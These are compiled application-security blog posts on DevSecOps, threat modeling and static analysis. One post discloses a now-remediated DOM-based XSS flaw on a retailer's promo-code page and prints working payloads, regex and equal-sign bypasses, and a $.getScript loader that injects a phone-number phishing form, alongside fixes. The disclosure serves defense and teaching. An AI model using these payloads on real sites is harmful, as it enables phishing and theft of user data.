Exploring the DevSecOps Toolchain

 

The authors of the SANS Institute’s DEV540 Secure DevOps & Cloud Application Security course created the Secure DevOps Toolchain poster to help security teams build a methodology for integrating security into the DevOps workflow. The poster breaks DevOps down into 5 key phases and includes an extensive list of open source tools to help DevOps teams level up their security.

In a new presentation titled Continuous Security: Exploring the DevSecOps Toolchain (Phases 1-2), I spend the entire hour walking the attendees through the first 2 phases of the DevOps workflow:

  • Pre-Commit: Security controls that take place as code is written and before code is checked into version control.
  • Commit: Fast, automated security controls that are invoked by continuous integration tools during the build.

I had the opportunity to present this talk at the Australian Information Security Association’s National Cyber Conference 2018 event this month in Melbourne, as well as at a local SANS Community event in Sydney. For those who asked, the presentation slides can be found here:

Continuous Security: Exploring the DevSecOps Toolchain (Phases 1-2)

In the next round, we’ll pick up where we left off and explore Phases 3-4. Until then, cheers!

To learn more about DevSecOps and Cloud Security, check out the DEV540: Secure DevOps and Cloud Application Security course!
 

About the Author

 
Eric Johnson is a co-founder and principal security engineer at Puma Security focusing on modern static analysis product development and DevSecOps automation. His experience includes application security automation, cloud security reviews, static source code analysis, web and mobile application penetration testing, secure development lifecycle consulting, and secure code review assessments.

Previously, Eric spent 5 years as a principal security consultant at an information security consulting firm helping companies deliver secure products to their customers, and another 10 years as an information security engineer at a large US financial institution performing source code audits.

As a Certified Instructor with the SANS Institute, Eric authors information security courses on DevSecOps, cloud security, secure coding, and defending mobile apps. He serves on the advisory board for the SANS Security Awareness Developer training program, delivers security training around the world, and presents security research at conferences including SANS, BlackHat, OWASP, BSides, JavaOne, UberConf, and ISSA.

Eric completed a bachelor’s degree in computer engineering and a master’s degree in information assurance at Iowa State University, and currently holds the CISSP, GWAPT, GSSP-.NET, GSSP-Java, and AWS Developer certifications.
 

Your Secure DevOps Questions Answered

 

As SANS prepares for the 2nd Annual Secure DevOps Summit, Co-Chairs Frank Kim and Eric Johnson are tackling some of the common questions they get from security professionals who want to understand how to inject security into the DevOps pipeline, leverage leading DevOps practices, and secure DevOps technologies and cloud services.

If you are considering attending the Secure DevOps Summit or have already registered, this post is a good warmup, as these questions will be covered in-depth at the Summit on October 22nd-23rd in Denver, CO.
 

1. What do security professionals need to do to implement Secure DevOps processes?

SecDevOps requires security and compliance teams to integrate their processes, policies, and requirements into the same workflows used by Development & Operations. This does not happen without the security team understanding the current development and operations engineering processes, technologies, and tools.

The Continuous Integration (CI) tool, one of the most important pieces in the DevOps process, manages the workflow, executes steps, and ties the entire toolchain together. Common examples include Jenkins, Visual Studio Team Services (VSTS), Travis CI, Bamboo, and TeamCity.

Leveraging the CI tool, SecDevOps teams will start to integrate important security touch points such as:

  • Pre-Commit Security Hooks – Code checkers that scan for secrets (private keys, system passwords, cloud access keys, etc.) before code is committed to version control (see the sketch after this list).
  • Static Source Code Scanning – Scanning source code files (infrastructure templates, application source code) for security vulnerabilities in the build pipeline.
  • Security Unit Tests – Custom security unit tests written by the security and engineering teams to provide coverage for abuser stories and negative test cases.
  • Dynamic Application Security Testing – Scanning a running application for common security vulnerabilities (OWASP Top 10) and misconfigurations, and enforcing acceptance criteria using tools such as Gauntlt / BDD-Security.
  • Secrets Management – Automating the provisioning and storage of secrets using tools such as Vault, Conjur, AWS KMS, and Azure Key Vault.
  • Continuous Monitoring – Monitoring the production environment for vulnerabilities, anomalies, and in-progress attacks using tools such as StatsD, Graphite, and Grafana.
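
As a concrete illustration of the first touch point, here is a minimal, hypothetical pre-commit secrets check written as a Node.js script. It is only a sketch: the regex patterns and hook wiring are assumptions for illustration, and most teams would rely on a dedicated secrets scanner from the toolchain poster rather than a hand-rolled script.

[sourcecode]
const { execSync } = require("child_process");
const fs = require("fs");

// Illustrative patterns for a few common secret formats.
const patterns = [
  /AKIA[0-9A-Z]{16}/,                        // AWS access key ID format
  /-----BEGIN (RSA |EC )?PRIVATE KEY-----/,  // PEM private key header
  /password\s*[:=]\s*['"][^'"]+['"]/i,       // hard-coded password assignment
];

// Files staged for the current commit.
const staged = execSync("git diff --cached --name-only", { encoding: "utf8" })
  .split("\n")
  .filter((file) => file && fs.existsSync(file));

let failed = false;
for (const file of staged) {
  const contents = fs.readFileSync(file, "utf8");
  for (const pattern of patterns) {
    if (pattern.test(contents)) {
      console.error("Possible secret in " + file + " (pattern: " + pattern + ")");
      failed = true;
    }
  }
}

// Wired into .git/hooks/pre-commit, a non-zero exit code blocks the commit.
process.exit(failed ? 1 : 0);
[/sourcecode]

Invoked from .git/hooks/pre-commit, a script like this stops a commit whenever a staged file matches one of the patterns, giving the developer a chance to remove the secret before it ever reaches version control.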

 

2. What Secure DevOps tools should I use?

The authors of the SANS Institute’s DEV540 Secure DevOps & Cloud Application Security course put together a Secure DevOps Toolchain poster. Our SecDevOps Toolchain breaks the SecDevOps process down into 5 key phases with a detailed list of associated tools.

  • Pre-Commit: Security controls that can take place before code is checked into version control.
  • Commit: Fast, automated security checks that are invoked by continuous integration tools during the build.
  • Acceptance: Automated security acceptance tests, functional tests, and out of band security scans that are invoked by continuous integration tools as artifacts are delivered to testing / staging environments.
  • Production: Security smoke tests and configuration checks that are invoked by continuous integration tools as artifacts are delivered to the production environment.
  • Operations: Continuous security monitoring, testing, auditing, and compliance checks running in production and providing feedback to SecDevOps teams.

 

3. How important is culture in an organization moving towards SecDevOps?

John Willis, Damon Edwards, and Jez Humble came up with the CALMS model to understand and describe DevOps:

  • Culture – People come first
  • Automation – Rely on tools for efficiency + repeatability
  • Lean – Apply Lean engineering practices to continuously improve
  • Measurement – Use data to drive decisions and improvements
  • Sharing – Share ideas, information and goals across organizational silos

There is a reason that Culture is first on the list. DevOps creates an open, diverse working environment that empowers teams to work together to solve problems, fail fast, and continuously improve.

Here is the biggest challenge integrating the “Sec” into “DevOps”: traditional security cultures are always ready to say “no”, fail to share information across the organization, and do not tolerate failure.

This is also evidenced in how CISOs lead their organizations and interact with development teams and the rest of the business. There are three different types of CISOs: the dictator, the collaborator, and the partner.

By always saying “no,” the dictator fails to consider how security introduces unnecessary friction into existing development and business processes. For SecDevOps to be successful, security leaders need to become collaborators by understanding engineering practices, processes, and tools. Even better, security leaders can become partners by understanding business goals and earning a seat at the executive table.
 

4. How do you measure the success of SecDevOps?

SecDevOps teams often measure success by monitoring change frequency, deployment success / failure rates, and the mean time to recover (MTTR) from a failure.

For the “Sec” component, assume that a vulnerability assessment or penetration test uncovers a critical patch missing from a system. How long does it take the feedback from the security team to enter the operations workflow, build a new gold image, run automated acceptance tests to validate the changes, and roll the gold image into production? Mean time to recover (MTTR) is a critical metric for measuring success.

Measuring the number of vulnerabilities discovered by automated testing in the pipeline versus the number that escape to production shows the effectiveness of the pipeline and its improvement over time.

Tracking the window of exposure, or how long vulnerabilities remain open in production, provides important metrics for management to see progress.

These metrics also help address management concerns, because they show the process working and making the organization more secure.
 

5. What does “Security as code” mean?

Automation requires all steps to be written as code and checked into version control. Development engineering teams have been writing code since the beginning. Modern operations teams are now writing “infrastructure as code” using tools like Chef, Puppet, and Ansible to create and configure cloud infrastructure, on-premise infrastructure, gold images, and network devices.

Security as code takes this approach a step further by converting manual security and compliance steps into automated, repeatable scripts that can be executed inside a CI pipeline. Security tools are quickly evolving to have APIs and command line interfaces to support “security as code” instead of manually configuring a scanner and pressing a button.

In a SecDevOps world, security tools that cannot be automated through an API or from the command line are not worth purchasing.
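
To make the idea concrete, here is a small, hypothetical example of security as code: a Node.js step in a CI pipeline that invokes a command-line scanner and fails the build when critical findings are reported. The scanner name, flags, and report format are placeholders, not a specific product’s interface.

[sourcecode]
const { execFileSync } = require("child_process");

try {
  // Run the (hypothetical) scanner against the checked-out source tree and
  // capture its JSON report. "example-scanner" and its flags are placeholders.
  const report = execFileSync("example-scanner", ["--format", "json", "src/"], {
    encoding: "utf8",
  });

  // Fail the build when the report contains critical findings.
  const findings = JSON.parse(report).findings || [];
  const critical = findings.filter((finding) => finding.severity === "critical");

  if (critical.length > 0) {
    console.error("Build failed: " + critical.length + " critical finding(s).");
    process.exit(1); // a non-zero exit code fails the CI job
  }
  console.log("Security scan passed.");
} catch (err) {
  // Treat scanner errors (missing tool, crash) as a build failure as well.
  console.error("Scanner execution failed: " + err.message);
  process.exit(1);
}
[/sourcecode]

Because the step lives in version control alongside the application code, it is repeatable, reviewable, and runs the same way on every commit.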
 

Summary

Many security teams jump in too quickly and disrupt the engineering workflows. It is important to start slowly and tackle one step at a time. Security teams must ensure new security steps are working properly, evaluate the results, fine-tune scanners, and minimize false positives before even considering disrupting the workflow.

To learn more about DevOps and Cloud Security, check out DEV540: Secure DevOps and Cloud Application Security!
 

About the Authors
 
Eric Johnson is a co-founder and principal security engineer at Puma Security focusing on modern static analysis product development and DevSecOps automation. His experience includes application security automation, cloud security reviews, static source code analysis, web and mobile application penetration testing, secure development lifecycle consulting, and secure code review assessments.

Previously, Eric spent 5 years as a principal security consultant at an information security consulting firm helping companies deliver secure products to their customers, and another 10 years as an information security engineer at a large US financial institution performing source code audits.

As a Certified Instructor with the SANS Institute, Eric authors information security courses on DevSecOps, cloud security, secure coding, and defending mobile apps. He serves on the advisory board for the SANS Security Awareness Developer training program, delivers security training around the world, and presents security research at conferences including SANS, BlackHat, OWASP, BSides, JavaOne, UberConf, and ISSA.

Eric completed a bachelor’s degree in computer engineering and a master’s degree in information assurance at Iowa State University, and currently holds the CISSP, GWAPT, GSSP-.NET, and GSSP-Java certifications.
 


Frank Kim is the founder of ThinkSec, a security consulting and CISO advisory firm. Previously, as CISO at the SANS Institute, Frank led the information risk function for the most trusted source of computer security training and certification in the world. With the SANS Institute, Frank continues to lead the management and software security curricula, helping to develop the next generation of security leaders.

Frank was also executive director of cybersecurity at Kaiser Permanente where he built an innovative security program to meet the unique needs of the nation’s largest not-for-profit health plan and integrated health care provider with annual revenue of $60 billion, 10 million members, and 175,000 employees.

Frank holds degrees from the University of California at Berkeley and is the author and instructor of popular courses on strategic planning, leadership, application security, and DevOps. For more, visit frankkim.net.

Continuous Opportunity – DevOps and Security

 
Thank you to everyone at the Minnesota ISSA chapter for the opportunity to share some background on DevOps and some ideas about how security teams can benefit by adopting DevOps practices & tools. The presentation slides are available here:

Continuous Opportunity – DevOps and Security.

To learn more about DevOps and Cloud Security, check out the new DEV540: Secure DevOps and Cloud Application Security course!
 

About the Author
At the SANS Institute, Ben Allen works as a member of the Information Security team to protect the world’s most trusted source of computer security training, certification, and research. He applies knowledge gained through more than a decade of information security experience to problem domains ranging from packet analysis to policy development. Ben has contributed to security best practices for DevOps and has operationalized DevOps techniques for security teams, leading to improvements in release time and stability.

Prior to joining the Information Security team at SANS, Ben worked in both the operations and development teams at SANS, as a Security Engineer and Architect at the University of Minnesota, and long ago as a systems administrator for the LCSE. Ben holds numerous SANS certifications, and a Bachelor’s degree in Electrical Engineering.

2017 Application Security Survey is Live!

 
Our 2016 application security survey, led by Dr. Johannes Ullrich, saw AppSec Programs continuously improving. In this year’s 2017 survey led by Jim Bird, we will be looking at how AppSec is keeping up with rapidly increasing rates of change as organizations continue to adopt agile development techniques and DevOps.

The survey is officially live and will be open until July 21st. Take the survey now, and enter a drawing for a $400 Amazon gift card OR a free pass to the SANS Secure DevOps Summit in Denver, CO this October:

http://www.surveymonkey.com/r/2017SANSAppSecSurvey

The survey results will be presented by Eric Johnson in a webcast on Tuesday, October 24, 2017. Register for the webcast to be among the first to receive a copy of the 2017 Application Security Survey report: https://www.sans.org/webcasts/application-security-go-survey-results-105210

Taking Control of Your Application Security

 
Application security is hard. Finding the right people to perform application security work and manage the program is even harder. The application security space has twice as many job openings as candidates. Combine that with the fact that for every 200 software engineers there is only 1 security professional, and you have to ask: how do we staff a secure software group and integrate software security across an organization?

There are many approaches to solving this problem in use across the various industry verticals. Most involve hiring expensive consultants or conducting long job searches for candidates who rarely exist. My own software development background, and my work with software engineers in training and consulting engagements around the world, has led me to this conclusion: capable software security engineers are already working on your engineering teams. Management just needs to put a program in place to educate, empower, and build strong application security champions.

Over the years, I’ve had this conversation with several folks from many different organizations. With many having the same questions and looking for guidance, it became clear to me that this topic would make a great talk.

I had the privilege of presenting the “Taking Control of Your Application Security” talk during an evening session at SANS Orlando 2017 last week. Of course, we had a little fun with a case study and discussed some actionable takeaways for building a culture of secure software engineering. But most importantly, I walked the audience through my journey from software engineer to application security consultant.

A number of attendees have asked for a copy of the slides, which can be found here: Taking Control of Your Application Security

For more information on application security training, check out the following resources:

In-Depth Online / Classroom Training: SANS Application Security Curriculum

Developer Security Awareness Training: STH.Developer Training
 
About the Author
Eric Johnson is a Principal Security Consultant at Cypress Data Defense. At Cypress, he leads web and mobile application penetration testing, secure development lifecycle consulting, secure code review assessments, static source code analysis, security research, and security tool development. Eric has presented his security research at conferences around the world including SANS, BlackHat, OWASP AppSecUSA, BSides, JavaOne, UberConf, and ISSA. He has contributed to several open source projects including Puma Scan, AWS Critical Security Control Automation, and the OWASP Secure Headers project. Eric is also a Certified Instructor with the SANS Institute where he authors several application security courses, serves on the advisory board for the SANS Securing the Human Developer awareness training program, and delivers security training around the world. Eric completed a bachelor of science in computer engineering and a master of science in information assurance at Iowa State University, and currently holds the CISSP, GWAPT, GSSP-.NET, and GSSP-Java certifications.

DOM-based XSS in the Wild


Editor’s Note: Today’s post is from Phillip Pham. Phillip is a Security Engineer at APT Security Solutions. In this post, Phillip walks through a cross-site scripting vulnerability he identified in the Fry’s web application.

Disclaimer
At the time of writing, the stated vulnerability has already been remediated by Fry’s Electronics. Thank you for taking swift action!

Background
Fry’s Electronics is a consumer electronics retail chain with a presence in various regions across the country. Fry’s Electronics introduced a marketing concept to promote sales and track consumers’ spending habits by providing personalized “Promo Codes”. Once presented online and/or at a local store, these codes provide shoppers additional discounts on their electronics purchases.

Consumers are contacted periodically by Fry’s Electronics’ marketing “bot” via emails that include the aforementioned promo code (as seen in the screenshot below). To view the full list of discounted products, consumers are required to click the provided link (example below), with the promo code attached as a data parameter in the URL.

Promotional product listing URLs
This URL is hosted by Limelight Networks, a Content Delivery Network (CDN) vendor.
[sourcecode]
https://frys.hs.llnwd.net/…..?promocode=1234567%0D
[/sourcecode]

The following URL is used when viewing advertising materials on a mobile device.
[sourcecode]
https://images.frys.com/…?promocode=1234567%0D
[/sourcecode]

[Screenshot: FrysSample]

The Vulnerability
Web applications are often vulnerable to a common attack, Cross-Site Scripting (aka XSS), which leverages the lack of output encoding and input validation within a web application. The exploit allows a malicious actor (hacker) to inject JavaScript content (payloads) into the end user’s browser and execute malicious code. Often, this results in phishing for user credentials, stealing credit card information, distributing malware, and other malicious activities. Exploiting these vulnerabilities is usually fairly simple, yet yields devastating impact to end users.

Because Fry’s Electronics’ marketing web site reflects the promo code from an unfiltered data parameter, “promocode”, it creates an attack vector for XSS exploitation.

Initial Test
To confirm the Cross-Site Scripting vulnerability, a malicious payload was appended to the end of the promotion code parameter as follows:

[sourcecode]
https://frys.hs.llnwd.net/……/?promocode=1234567<script>alert(1)</script>
[/sourcecode]

Immediately, a popup displayed as shown in the screenshot below, confirming the vulnerability:

[Screenshot: FrysXss]

Let’s take a look at the offending code:

[sourcecode]
var promocode = getUrlParameter('promocode');
var pattern = new RegExp("[0-9]{1,7}");
var result = pattern.test(promocode);
var default_text = "Your PromoCode for this email:"+promocode;

if(result){
$(".prcode").html(default_text);
}
});
[/sourcecode]

Do you see any problems here? The “promocode” value, which is only partially validated on line 3, is written to the browser using the raw .html() method on line 7.

Phishing Campaign
As previously mentioned, XSS allows malicious actors to conduct phishing campaigns that lure their victims into providing personal information. In this context, a phishing campaign proof-of-concept was built to trick users into providing their personal cell phone numbers, further widening the attack surface to infect consumer mobile devices with exploits such as Stagefright (Android) or an iOS 0-day.

[Screenshot: FrysPhishing]

Note: The content of the floating panel (red) is loaded from an externally hosted JavaScript file which was embedded as part of the legitimate Fry’s marketing site.

Evasions
Simple exploitation of the vulnerability (an alert popup) requires minimal effort. However, such exploitation does not allow full delivery of the stated phishing campaign to the victims, diminishing its success rate. Based on further research and analysis of the web application’s HTML source code, the following series of events must take place in order to fully deliver the payload:

  • Allow the legitimate content to load completely
  • Deliver the externally hosted payload
  • Require victims to provide a cell phone number before they can dismiss the dialog (a floating DIV)

Evasion #1: Regular Expression Bypass
The application employs a “numbers only” validation against the actual “promocode” data parameter via client-side JavaScript (no further server-side validation):

[sourcecode]
var promocode = getUrlParameter('promocode');
var pattern = new RegExp("[0-9]{1,7}");
var result = pattern.test(promocode);
[/sourcecode]

The regular expression above only requires one to seven consecutive digits to appear somewhere in the value; because the pattern is not anchored, trailing characters (starting at the 8th position) are never validated. Hence, the payload executed during our initial test. The short example below illustrates the bypass.
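
Here is a minimal, self-contained illustration of why the unanchored pattern passes the malicious value, while an anchored pattern (one possible fix) rejects it:

[sourcecode]
// The unanchored pattern only needs to find 1-7 digits somewhere in the
// string, so the trailing markup is never inspected.
var unanchored = new RegExp("[0-9]{1,7}");
// Anchoring the pattern forces the entire value to be 1-7 digits.
var anchored = new RegExp("^[0-9]{1,7}$");

var payload = "1234567<script>alert(1)</script>";

console.log(unanchored.test(payload)); // true  - validation passes, payload delivered
console.log(anchored.test(payload));   // false - whole value must be numeric
[/sourcecode]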

Evasion #2: The equal sign (=) breaks trailing payloads
The application obtains the name and value of the promo code data parameter via the “getUrlParameter” function (snippet below).

[sourcecode]
function getUrlParameter(sParam) {
var sPageURL = decodeURIComponent(window.location.search.substring(1)),
sURLVariables = sPageURL.split('&'),
sParameterName,
i;

for (i = 0; i < sURLVariables.length; i++) {
sParameterName = sURLVariables[i].split('=');

if (sParameterName[0] === sParam) {
return sParameterName[1] === undefined ? true : sParameterName[1];
}
}
}
[/sourcecode]

With the current script implementation, given the payload:

[sourcecode]
?promocode=1234567<script src=https://localhost/test.js></script>
[/sourcecode]

The trailing external URL is nullified because the script detects the equal (=) sign and treats everything after it as another parameter/value pair. This yields the output:

[sourcecode]
1234567<script src
[/sourcecode]

To defeat this logic, the payload must not contain the equal (=) sign.
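
A quick stand-alone demonstration of the same split behavior (reusing the localhost test URL from above) shows how the payload gets cut short:

[sourcecode]
// getUrlParameter splits each query-string pair on "=" and returns only the
// token immediately after the first equal sign, so everything following a
// second "=" (such as the script src URL) is dropped.
var sample = "promocode=1234567<script src=https://localhost/test.js></script>";
var pieces = sample.split("=");
console.log(pieces[1]); // "1234567<script src" - the payload is truncated
[/sourcecode]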

Evasion #3: The Working Payload
Upon further review, the application uses Google-hosted jQuery to dynamically render content. Furthermore, jQuery can load an external script (acting as the src) via its .getScript('url') method, which does not require an equal sign (=). An example of using jQuery to reference an external script is shown below.

[sourcecode]
$.getScript(%27https://localhost/test.js%27,function(){})
[/sourcecode]

Putting it all together
Once the evasions have been fully worked out, the rest is trivial; the following payload renders the phishing content shown below.

[sourcecode]
?promocode=1234567%3Cscript%3E$(document).ready(function(event){$.getScript(%27https://localhost/test.js%27,function(){})});%3C/script%3E
[/sourcecode]

The evil JavaScript file (test.js) contains the following content:

[sourcecode]
var div = document.createElement("div");
div.style.width = "700px";
div.style.height = "150px";
div.style.background = "red";
div.style.color = "white";
div.innerHTML = "CONGRATULATIONS…";
div.style.position = "absolute"; // floating div
div.style.top = "20%"; // floating div
div.style.left = "20%"; // floating div
document.getElementsByTagName('body')[0].appendChild(div);
[/sourcecode]

As you can see from the screenshot below, the form is injected into the page and asks the user for their phone number:

[Screenshot: FrysPayload1]

Then, pressing submit results in the phone number being sent to the evil site:

[Screenshot: FrysPayload2]

Mitigation Strategies
As we have seen many times before, XSS vulnerabilities can be fixed using a combination of output encoding and input validation. Some simple mitigations are as follows:

  • This is a classic DOM-based XSS vulnerability. OWASP provides a DOM-based XSS Prevention Cheat Sheet for fixing it. In short, use an encoding library (e.g., jQuery Encoder) to HTML encode the promo code before writing it to the page (see the sketch after this list)
  • Fix the validation routine to check the entire input value
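
As a minimal sketch of both mitigations applied to the vulnerable snippet above (assuming the same getUrlParameter helper and the same jQuery selector), the value can be validated in full and written as text rather than HTML:

[sourcecode]
var promocode = getUrlParameter('promocode');

// Validate the entire value, not just a leading substring of digits.
if (/^[0-9]{1,7}$/.test(promocode)) {
// .text() writes the value as text content, so any markup that slips
// through is displayed rather than executed by the browser.
$(".prcode").text("Your PromoCode for this email:" + promocode);
}
[/sourcecode]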

For more information on defending applications, check out the courses available in the SANS Application Security curriculum.

About the Author
Phillip Pham is a security engineer with a strong passion for Information Security. Phillip has worked in various sectors and for organizations of various sizes, ranging from small start-ups to Fortune 500 companies. Prior to transitioning into an Information Security career, Phillip spent ten years in software engineering. His last five years of Information Security experience have been focused on Application Security. Some of his application security assessment strengths (both on-premise and cloud-based) include web applications, web services, APIs, Windows client applications, and mobile applications. He currently holds a GCIH certification and is co-founder of APT Security Solutions. Follow Phillip on Twitter @philaptsec.

Threat Modeling: A Hybrid Approach


Editor’s Note: Today’s post is from Sriram Krishnan. Sriram is a Security Architect at Pegasystems. In this post, Sriram introduces a hybrid threat modeling white paper addressing the limitations in traditional threat modeling methodologies.

In the face of increasing attacks at the application layer and enterprise applications moving towards the cloud, organizations must look at security not just as a function, but as a key business driver. It goes without saying that organizations have an inherent responsibility to provide a secure operating environment for their customers and employees and to protect their interests. Understanding the threat landscape is an important prerequisite for building secure applications. Unless the people developing software applications are aware of the threats their applications are exposed to in production, it is not possible to build secure applications. A SANS survey (2015 State of Application Security: Closing the Gap) indicates that threat assessment (which can also be referred to as threat modeling) is the second leading application security practice (next to penetration testing) for building secure web applications. This helps prove that threat modeling is a fundamental building block for secure software.

Threat modeling should be viewed as a proactive security practice to identify security weaknesses in software applications early in the Software Development Lifecycle. This enables software developers to build applications with an understanding of the associated threats. There are various published techniques for performing threat modeling, such as STRIDE, Attack Trees, and Attack Libraries. Organizations tend to favor a particular technique when performing a threat modeling exercise. However, these techniques each have their own advantages and limitations in real-world implementations.

The STRIDE technique is good at enumerating threats, but it does not aid in developing countermeasures and mitigation plans. An Attack Tree provides an overview of the attack surface at some level of abstraction, which means it fails to capture data essential for understanding the threat scenario. Finally, an Attack Library may provide information about attack vectors and work well as a checklist, but it does not contribute to a complete threat model. When these techniques are implemented separately, some of the key aspects required for threat modeling may be missed, impacting the productivity and comprehensiveness of the exercise.

To reap the complete benefit of threat modeling, I propose utilizing a combination of modeling techniques to perform the various activities and tasks involved in the threat modeling process. This hybrid model addresses those limitations by adopting a structured approach, capturing the right level of detail, and representing the data in an intelligible way.

The following white paper analyzes the various limitations of the STRIDE, Attack Tree, and Attack Library methodologies and presents a hybrid model that implements the best techniques from each option.

A Hybrid Approach to Threat Modeling

I have also created a GitHub project that contains a Threat Modeling Template for project teams to use as they get started:

Threat Modeling

About the Author
Sriram Krishnan (@sriramk21) is a cyber security professional with 12 years of experience, currently working as a Security Architect at Pegasystems Worldwide. He has worked with a leading internet service provider, a Big 4 consulting firm, and global banks, performing penetration testing and security architecture reviews and advising on security best practices for the global telecom industry, the banking and financial services sector, and government entities.

Continuous Integration: Live Static Analysis with Roslyn

Early in 2016, I had a conversation with a colleague about the very, very limited free and open-source .NET security static analysis options. We discussed CAT.NET, which was released back in 2009 and hasn’t been updated since. Next came FxCop, which has a few security rules looking for SQL Injection and Cross-Site Scripting included in the Visual Studio Code Analysis Microsoft Security Rules. Then there are the various configuration analyzer tools that run checks against web.config files, such as the Web Configuration Security Analyzer (WCSA) tools written by Troy Hunt and James Jardine.

Even combining all of these scans leaves .NET development teams with a few glaring problems:

  • From past experience, I know that CAT.NET and FxCop have very poor coverage of secure coding issues covered by OWASP, SANS / CWE Top 25, etc. See the presentation slides below for stats from CAT.NET and FxCop scans against a vulnerable .NET target app. The results are very concerning.
     
  • Aside from the Visual Studio Code Analysis rules, none of the tools run inside Visual Studio, where engineers are actually writing code. This means more add-on tools that need to be run by the security / development leads, resulting in more reports to manage and import into bug tracking systems. For this reason, it is very unlikely these scans are run before committing code, which in my opinion is too late in the development process.

There has to be a better way, right?
 
Roslyn – The .NET Compiler Platform
At the end of the conversation, my colleague asked me if I had tried writing any Roslyn rules yet. Wait, what’s Roslyn? After some quick searching, I discovered that Roslyn, aka the .NET Compiler Platform, is a set of code analysis APIs for the C# and Visual Basic compilers. Using Roslyn, Microsoft provides a way to query and report diagnostics on just about any piece of code. These diagnostic warnings are displayed in two different places:

  • Inside a code document, diagnostic warnings show as spell-check-style squiggles as code is being written! See the following screenshot for an example:
    Puma Scan diagnostic warning in code
     
  • In the Error List, diagnostic warnings are added to the standard list of compiler errors. Roslyn provides rule authors the ability to create custom warnings (or errors if you want to be THAT disruptive security team that slows down dev teams) in the list. See the following screenshot for an example:
    Puma Scan diagnostics added to the error list.
     

After reading Alex Turner’s MSDN Magazine article, I realized that the Roslyn team at Microsoft had provided me exactly what I needed to build a powerful, accurate secure coding engine that runs inside of Visual Studio. During development. As code is written. Before code enters the repository. Bingo!

With that, I decided to help address the lack of free .NET static analysis tools.
 
The Puma Scanner
Once we figured out the Roslyn basics, my team and I spent a small part of our consulting hours over the past 4 months learning about the various types of analyzers and building security rules. Of course we had some help, as the folks on the Roslyn team at Microsoft and the Roslyn Gitter channel are very helpful with newbie questions.

Last week, I had the pleasure of presenting our progress at the OWASP AppSec USA conference in Washington, DC. While there is a lot of work left to be done, we are happy to say that Puma Scan has roughly 40 different rules looking for insecure configuration, cross-site scripting, SQL injection, unvalidated redirects, password management issues, and cross-site request forgery. At this point, I am confident it is worthwhile running the scanner in your development environment and MSBuild pipeline to gain more advanced static analysis compared to the free options that exist today.

If you were unable to attend AppSec USA 2016, don’t worry. The hard working volunteers at OWASP record all of the sessions, which are posted on the OWASP YouTube channel. You can watch the presentation here: Continuous Integration: Live Static Analysis using Visual Studio & the Roslyn API session.

For now, as I promised those that attended the presentation, the presentation slides are available on Slideshare. Additionally, links to the Puma Scan web site, installation instructions, rules documentation, and github repository are available below. Let me know if you’re interested in contributing to the project!

To learn more about securing your .NET applications, sign up for DEV544: Secure Coding in .NET!
 
References
Puma Scan Web Site: https://www.pumascan.com/
AppSec USA Presentation: Continuous Integration: Live Static Analysis using Visual Studio & the Roslyn API
Github Repository: https://github.com/pumasecurity
Visual Studio Extension: https://visualstudiogallery.msdn.microsoft.com/80206c43-348b-4a21-9f84-a4d4f0d85007
NuGet Package: https://www.nuget.org/packages/Puma.Security.Rules/
 
About the Author
Eric Johnson (Twitter: @emjohn20) is a Senior Security Consultant at Cypress Data Defense, Application Security Curriculum Product Manager at SANS, and a certified SANS instructor. He is an author for DEV544 Secure Coding in .NET and DEV531 Defending Mobile App Security Essentials, as well as an instructor for DEV541 Secure Coding in Java/JEE and DEV534: Secure DevOps. Eric’s experience includes web and mobile application penetration testing, secure code review, risk assessment, static source code analysis, security research, and developing security tools. He completed a bachelor of science in computer engineering and a master of science in information assurance at Iowa State University, and currently holds the CISSP, GWAPT, GSSP-.NET, and GSSP-Java certifications.

Dev-Sec.io Automated Hardening Framework

 
Editor’s Note: Today’s post is from Jim Bird. Jim is the co-founder and CTO of a major U.S.-based institutional trading service, where he is responsible for managing the company’s technology organization and information security program.

Automated configuration management tools like Ansible, Chef and Puppet are changing the way that organizations provision and manage their IT infrastructure. These tools allow engineers to programmatically define how systems are set up, and automatically install and configure software packages. System provisioning and configuration becomes testable, auditable, efficient, scalable and consistent, from tens to hundreds or thousands of hosts.

These tools also change the way that system hardening is done. Instead of following a checklist or a guidebook like one of the CIS Benchmarks, and manually applying or scripting changes, you can automatically enforce hardening policies or audit system configurations against recognized best practices, using pre-defined hardening rules programmed into code.

An excellent resource for automated hardening is a set of open source templates originally developed at Deutsche Telekom, under the project name “Hardening.io”. The authors have recently had to rename this hardening framework to Dev-Sec.io.

It includes Chef recipes and Puppet manifests for hardening base Linux, as well as for SSH, MySQL and PostgreSQL, Apache and Nginx. Ansible support at this time is limited to playbooks for base Linux and SSH. Dev-Sec.io works on Ubuntu, Debian, RHEL, CentOS, and Oracle Linux distros.

For container security, the project team just added an InSpec profile for Chef Compliance against the CIS Docker 1.11.0 benchmark.

Dev-Sec.io is comprehensive and at the same time accessible. And it’s open, actively maintained, and free. You can review the rules, adopt them wholesale, or cherry pick or customize them if needed. It’s definitely worth your time to check it out on GitHub: https://github.com/dev-sec.

To learn more about Dev, Ops, and Security, check out the new SANS Application Security course Secure DevOps: A Practical Introduction co-authored by Jim Bird (@jimrbird) and Ben Allen (@mr_secure).

This post was originally posted by Jim Bird at http://swreflections.blogspot.com

About the Author
Jim Bird, SANS analyst and lead author of the SANS Application Security Survey series, is an active contributor to the Open Web Application Security Project (OWASP) and a popular blogger on agile development, DevOps and software security at his blog, “Building Real Software.” He is the co-founder and CTO of a major U.S.-based institutional trading service, where he is responsible for managing the company’s technology organization and information security program. Jim is an experienced software development professional and IT manager, having worked with high-integrity and high-reliability systems at stock exchanges and banks in more than 30 countries. He holds PMP, PMI-ACP, CSM, SCPM and ITIL certifications.

2016 State of Application Security: Skills, Configurations, and Components

 
The 2016 SANS State of Application Security Survey analyst paper and webcast are complete. This year, Johannes Ullrich, dean of research at the SANS Technology Institute and instructor for DEV522: Defending Web Applications Security Essentials, led the project by analyzing the survey results, writing the whitepaper, and delivering the webcast.

We had 475 respondents participate in this year’s survey, and Johannes identified the following key findings to discuss in the whitepaper:

  • 38% have a “maturing” AppSec program
  • 40% have documented approaches and policies to which third-party software vendors must adhere
  • 41% name public-facing web apps as the leading cause of breaches

For more details, the webcast and whitepaper can be found here:

Whitepaper:
2016 State of Application Security: Skills, Configurations and Components

Webcast:
Managing Applications Securely: A SANS Survey

Thank you to all of the sponsors for bringing this content to the SANS community: Checkmarx, Veracode, and WhiteHat Security.

Also, a special thank you goes out to the webcast panel: Amit Ashbel (Checkmarx), Tim Jarrett (Veracode), and Ryan O’Leary (WhiteHat).

We will see you next year for the 2017 State of Application Security Survey!